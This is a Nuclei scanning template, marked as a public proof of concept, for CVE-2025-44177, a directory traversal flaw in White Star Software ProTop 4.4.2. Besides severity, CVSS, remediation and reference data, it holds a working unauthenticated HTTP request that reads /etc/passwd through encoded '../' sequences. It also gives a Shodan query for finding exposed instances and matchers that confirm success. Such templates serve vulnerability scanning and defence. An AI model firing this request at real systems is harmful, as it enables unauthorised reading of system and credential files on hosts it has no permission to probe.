A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
PoC代码[已公开]
id: CVE-2025-44177
info:
name: White Star Software ProTop - Directory Traversal
author: s-cu-bot
severity: high
description: |
A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
impact: |
Unauthenticated attackers can read arbitrary files from the operating system through encoded traversal sequences in the /pt3upd/ endpoint, potentially exposing sensitive configuration and credential files.
remediation: |
Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-44177
- https://client.protop.co.za/
- https://wss.com/
- https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2025-44177
epss-score: 0.0754
epss-percentile: 0.91576
cwe-id: CWE-22
cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: white-star-software
product: protop
shodan-query: html:"<title>ProTop"
tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev,vuln
http:
- raw:
- |
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- 'application/octet-stream'
- 'filename="passwd"'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c905dadbde0a9aef2b9abb110df607e1097c39707eb78c395282118d636abd470220183896150cf1f60d4645f23ed4af9a2d55b7b819ea205669b1b29baa83d9d629:922c64590222798bb761d5b6d8e72950